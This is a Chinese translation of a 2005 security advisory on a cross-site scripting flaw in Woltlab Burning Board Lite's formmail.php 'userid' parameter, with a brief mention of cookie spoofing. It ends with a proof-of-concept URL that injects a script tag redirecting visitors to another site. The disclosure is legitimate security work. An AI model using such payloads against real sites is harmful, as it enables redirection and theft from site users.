[翻译]Woltlab Burning Board Lite formmail.php 跨站脚本攻击
本文作者: Z.C.Y[B.C.T]文章出处: 原创翻译
翻译网站: [url]http://www.bnso.net[/url]
安全公告:<20050108192957.25739.qmail () www ! securityfocus ! com>
发布日期:2005-01-08 19:29:57
发布作者:drhankey / it-security23.net
厂商名字:Woltlab
厂商主页:[url]http://www.woltlab.de[/url]
软件名字:Woltlab Burning Board Lite
影响版本:1.0.0, 1.0.1e,可能还有其它版本
运行平台:独立系统,PHP
软件描述:Woltlab Burning Board Lite是一个基于PHP的布告牌的Woltlab Burning Board的免费版本。
漏洞描述:formmail.php输出的"userid"没有过滤,因此可以加\任意代码构造一个畸形连接传递给输出。
这个布告牌还可以进行cookies欺骗。
测试内容:[url]http://website/board/formmail.php?userid=1[/url]"><script>document.location.href="http \
://www.it-security23.net";</script x="y
页:
[1]